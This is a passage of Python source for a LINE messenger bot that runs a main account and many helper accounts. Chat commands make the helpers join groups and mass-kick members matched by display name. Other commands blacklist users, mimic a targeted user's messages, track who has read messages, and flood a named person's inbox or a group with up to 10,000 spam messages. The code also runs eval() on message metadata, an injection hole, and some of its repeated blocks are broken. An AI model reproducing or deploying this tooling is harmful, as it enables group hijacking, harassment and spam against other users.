ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki4.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck5 " in msg.text:
nk0 = msg.text.replace("Fuck5 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck6 " in msg.text:
nk0 = msg.text.replace("Fuck6 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki6.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck7 " in msg.text:
nk0 = msg.text.replace("Fuck7 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki7.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki7.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck8 " in msg.text:
nk0 = msg.text.replace("Fuck8 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki8.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki8.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck9 " in msg.text:
nk0 = msg.text.replace("Fuck9 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki9.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki9.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck10 " in msg.text:
nk0 = msg.text.replace("Fuck10 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki10.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki10.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck11 " in msg.text:
nk0 = msg.text.replace("Fuck11 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki11.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki11.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki11.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck12 " in msg.text:
nk0 = msg.text.replace("Fuck12 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki12.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki12.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki12.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck13 " in msg.text:
nk0 = msg.text.replace("Fuck13 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki13.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki13.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki13.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck14 " in msg.text:
nk0 = msg.text.replace("Fuck14 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki14.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki14.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki14.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck15 " in msg.text:
nk0 = msg.text.replace("Fuck15 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki15.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki15.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki15.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck16 " in msg.text:
nk0 = msg.text.replace("Fuck16 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki16.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki16.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki16.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck17 " in msg.text:
nk0 = msg.text.replace("Fuck17 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki17.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki17.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki17.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif "Fuck18 " in msg.text:
nk0 = msg.text.replace("Fuck18 ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki18.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
ki18.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki18.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#-----------------------------------------------------------
elif ("Fuck " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Kick1 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki.kickoutFromGroup(msg.to,[target])
except:
ki.sendText(msg.to,"Error")
elif ("Kick2 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki2.kickoutFromGroup(msg.to,[target])
except:
ki2.sendText(msg.to,"Error")
elif ("Kick3 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki3.kickoutFromGroup(msg.to,[target])
except:
ki3.sendText(msg.to,"Error")
elif ("Kick4 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki4.kickoutFromGroup(msg.to,[target])
except:
ki4.sendText(msg.to,"Error")
elif ("Kick5 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki5.kickoutFromGroup(msg.to,[target])
except:
ki5.sendText(msg.to,"Error")
elif ("Kick6 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki6.kickoutFromGroup(msg.to,[target])
except:
ki6.sendText(msg.to,"Error")
elif ("Kick7 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki7.kickoutFromGroup(msg.to,[target])
except:
ki7.sendText(msg.to,"Error")
elif ("Kick8 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki8.kickoutFromGroup(msg.to,[target])
except:
ki8.sendText(msg.to,"Error")
elif ("Kick9 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki9.kickoutFromGroup(msg.to,[target])
except:
ki9.sendText(msg.to,"Error")
elif ("Kick10 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki10.kickoutFromGroup(msg.to,[target])
except:
ki10.sendText(msg.to,"Error")
elif ("Kick11 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki11.kickoutFromGroup(msg.to,[target])
except:
ki11.sendText(msg.to,"Error")
elif ("Kick12 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki12.kickoutFromGroup(msg.to,[target])
except:
ki12.sendText(msg.to,"Error")
elif ("Kick13 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki13.kickoutFromGroup(msg.to,[target])
except:
ki13.sendText(msg.to,"Error")
elif ("Kick14 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki14.kickoutFromGroup(msg.to,[target])
except:
ki14.sendText(msg.to,"Error")
elif ("Kick15 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki15.kickoutFromGroup(msg.to,[target])
except:
ki15.sendText(msg.to,"Error")
elif ("Kick16 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki16.kickoutFromGroup(msg.to,[target])
except:
ki16.sendText(msg.to,"Error")
elif ("Kick17 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki17.kickoutFromGroup(msg.to,[target])
except:
ki17.sendText(msg.to,"Error")
elif ("Kick18 " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
ki18.kickoutFromGroup(msg.to,[target])
except:
ki18.sendText(msg.to,"Error")
elif ("Sc " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
key = cl.getContact(key1)
cl.sendText(msg.to,"" + key1)
elif "Bro " in msg.text:
nk0 = msg.text.replace("Bro ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Good Bye")
#-----------------------------------------------------------
elif ("Bye " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
except:
pass
elif ("Ban " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Banned")
except:
pass
elif msg.text in ["Mygroups"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[⛓️] %s \n" % (cl.getGroup(i).name + " | ★ Members : " + str(len (cl.getGroup(i).members)))
cl.sendText(msg.to, "☆「Group List」☆\n"+ h +"★ ️Total Group : " +str(len(gid)))
#----------------------------------------------------------
elif "Unban @" in msg.text:
if msg.toType == 2:
print "[Unban]ok"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip()
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
elif "Ban:" in msg.text:
nk0 = msg.text.replace("Ban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Locked")
except:
cl.sendText(msg.to,"Error")
elif "Unban:" in msg.text:
nk0 = msg.text.replace("Unban:","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Target Unlocked")
except:
cl.sendText(msg.to,"Error")
#=======================================================
elif "Tr-en " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-en ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-jap " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-jap ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-thai " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-thai ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'th')
cl.sendText(msg.to,trs)
print '[Command] Translate thai'
except Exception as error:
cl.sendText(msg.to,(error))
elif "Tr-id " in msg.text:
#if msg.from_ in admin:
txt = msg.text.replace("Tr-id ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'id')
cl.sendText(msg.to,trs)
print '[Command] Translate ID'
except Exception as error:
cl.sendText(msg.to,(error))
#________________________________________________________________________
elif 'ig ' in msg.text.lower():
#if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("ig ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#-----------------------------------------------------------
elif msg.text == "Check":
cl.sendText(msg.to, "Check Yang nyimak")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "Cctv":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to,"======CCTV ON====== %s\n=====[CCTV SAAT INI]======\n%s\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to,"An already read point has not been set.\n「set」you can send ♪ read point will be created ♪")
#-------------------------------------------------
elif "Spam @" in msg.text:
# if msg.from_ in admin:
_name = msg.text.replace("Spam @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to,"Wating in progres...")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
cl.sendText(msg.to, "Succes")
print " Spammed !"
#--------------------------------------------------------------------------
#-----------------------------------------------------------
elif "Mban:" in msg.text:
midd = msg.text.replace("Mban:","")
wait["blacklist"][midd] = True
cl.sendText(msg.to,"Target Lock")
#-----------------------------------------------------------
elif "#leave" in msg.text:
try:
import sys
sys.exit()
except:
pass
#-----------------------------------------------------------
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
text = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (text+"\n")
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
ki.sendText(msg.to, text)
else:
cl.sendText(msg.to, "Out Of Range!")
elif txt[1] == "off":
if jmlh <= 10000:
ki.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
#-----------------------------------------------
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "Mimic:" in msg.text:
